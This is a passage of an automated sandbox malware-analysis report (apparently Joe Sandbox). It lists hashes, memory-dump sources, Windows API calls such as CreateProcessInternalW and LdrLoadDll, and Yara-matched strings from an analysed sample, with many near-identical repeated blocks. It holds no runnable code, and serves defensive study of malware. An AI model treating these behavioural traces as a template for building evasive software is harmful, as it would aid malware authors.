                                                                                                                                        • Opcode Fuzzy Hash: 55fcdb56d85eaef832583a900783710b3c66658576851d542e64db88cfcf79d8
                                                                                                                                        • Instruction Fuzzy Hash: 41900231615844129150B59948845564005D7E0301B55C015E0424654D8B558A565361
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: be2bed741a249f13f6bd2dd9d4702ee539262b2e11f6822b355dcdcf6c2b80ad
                                                                                                                                        • Instruction ID: e3c96ca23fae8f4eedb7b48ff0e7a746163dfa444492d1c2d4890c818d1f9899
                                                                                                                                        • Opcode Fuzzy Hash: be2bed741a249f13f6bd2dd9d4702ee539262b2e11f6822b355dcdcf6c2b80ad
                                                                                                                                        • Instruction Fuzzy Hash: 1C900261611544424150B59948044166005D7E1301395C119A0554660D875989559269
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 3b3b09f83a104c21103159e278869fb5e5020a7514f5862c789be14ed0a1813a
                                                                                                                                        • Instruction ID: f5cbc2c80b0707212833486e8120a0b912fefb3ba5bf839ff854daaafc30638c
                                                                                                                                        • Opcode Fuzzy Hash: 3b3b09f83a104c21103159e278869fb5e5020a7514f5862c789be14ed0a1813a
                                                                                                                                        • Instruction Fuzzy Hash: 36900261212444034115B5994414626400AC7E0201B55C025E1014690EC66689916125
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: f342c4218b2add0d5fe6c2f0e085fce2d6e0d78edc992e88d1921f6a8531b805
                                                                                                                                        • Instruction ID: c2bff83d9d39aa60cd735f583eab9ab098481d07159e2e13ffb2eb417623e860
                                                                                                                                        • Opcode Fuzzy Hash: f342c4218b2add0d5fe6c2f0e085fce2d6e0d78edc992e88d1921f6a8531b805
                                                                                                                                        • Instruction Fuzzy Hash: 4B90023121548C42D150B5994404A560015C7D0305F55C015A0064794E97668E55B661
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 8a0856e0526e2bb7de607fe93b5f1a1a05d62b2742d723a48f83b1120a757499
                                                                                                                                        • Instruction ID: 8dc41777c877080a477fac40f09c831b300965e96f6b508bb2bbb23c7a22bebd
                                                                                                                                        • Opcode Fuzzy Hash: 8a0856e0526e2bb7de607fe93b5f1a1a05d62b2742d723a48f83b1120a757499
                                                                                                                                        • Instruction Fuzzy Hash: E990023121144C02D190B599440465A0005C7D1301F95C019A0025754ECB568B5977A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: d17f3ec77994904f00ac8bca3650a15fd1c12a2d3980adeff52014f3e2dd0529
                                                                                                                                        • Instruction ID: c052f88f401ae76ebc6cd050607b65fbda7d7ece45f43609e2c42082d18e0755
                                                                                                                                        • Opcode Fuzzy Hash: d17f3ec77994904f00ac8bca3650a15fd1c12a2d3980adeff52014f3e2dd0529
                                                                                                                                        • Instruction Fuzzy Hash: FE90023161544C02D160B59944147560005C7D0301F55C015A0024754E87968B5576A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: cc068bf23754a3fe41933ddd0c0731cc36edb900b06ea7b08449ee46b5915e3d
                                                                                                                                        • Instruction ID: cd2e46b81ab11ff03bbf80972b023916cb12d59d8a10d5afdf4cc6a5f339048d
                                                                                                                                        • Opcode Fuzzy Hash: cc068bf23754a3fe41933ddd0c0731cc36edb900b06ea7b08449ee46b5915e3d
                                                                                                                                        • Instruction Fuzzy Hash: 3C900225231444020155F999060451B0445D7D6351395C019F1416690DC76289655321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 9b0e182265a8cb3e35a14341c15b021b829373d87cf1b83435d1eedfbe2f2de1
                                                                                                                                        • Instruction ID: 65be07c88f82bb8900bbb522af18c26a34bb504ab879fa26d43d1755fc9931cf
                                                                                                                                        • Opcode Fuzzy Hash: 9b0e182265a8cb3e35a14341c15b021b829373d87cf1b83435d1eedfbe2f2de1
                                                                                                                                        • Instruction Fuzzy Hash: F3900435331444030115FDDD07045170047C7D5351355C035F1015750DD773CD715131
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 0e4490e65941708d788ad07970c801636abebfff9396784f24651c238feb521e
                                                                                                                                        • Instruction ID: ee436b08eebd6016bc25573985b8f35b73ec3f7adf0392ea34d3256588278f8c
                                                                                                                                        • Opcode Fuzzy Hash: 0e4490e65941708d788ad07970c801636abebfff9396784f24651c238feb521e
                                                                                                                                        • Instruction Fuzzy Hash: A390022125549502D160B59D44046264005E7E0201F55C025A0814694E869689556221
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: effb525cb204ab0a935260455030f48a7c2a06e8bfc40cd02136bdb212d3f773
                                                                                                                                        • Instruction ID: e8737c787ffb50c45a0b3237419c4309f60d9149092157a22314e4393f9479eb
                                                                                                                                        • Opcode Fuzzy Hash: effb525cb204ab0a935260455030f48a7c2a06e8bfc40cd02136bdb212d3f773
                                                                                                                                        • Instruction Fuzzy Hash: 1390026135144842D110B5994414B160005C7E1301F55C019E1064654E875ACD526126
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 498 e107d9-e1084a call e29d20 call e2a730 call e141e0 call e01410 call e21050 510 e1086a-e10870 498->510 511 e1084c-e1085b PostThreadMessageW 498->511 511->510 512 e1085d-e10867 511->512 512->510
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00E10857
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 513 e107e0-e1084a call e29d20 call e2a730 call e141e0 call e01410 call e21050 524 e1086a-e10870 513->524 525 e1084c-e1085b PostThreadMessageW 513->525 525->524 526 e1085d-e10867 525->526 526->524
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00E10857
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00E229FB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E1E9C7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID: @J7<
                                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E1E9C7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID: @J7<
                                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00E14252
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,00E17AD3,00000010,?,?,?,00000044,?,00000010,00E17AD3,?,?,?), ref: 00E28203
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00E116F0,gk,GD,?), ref: 00E17953
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
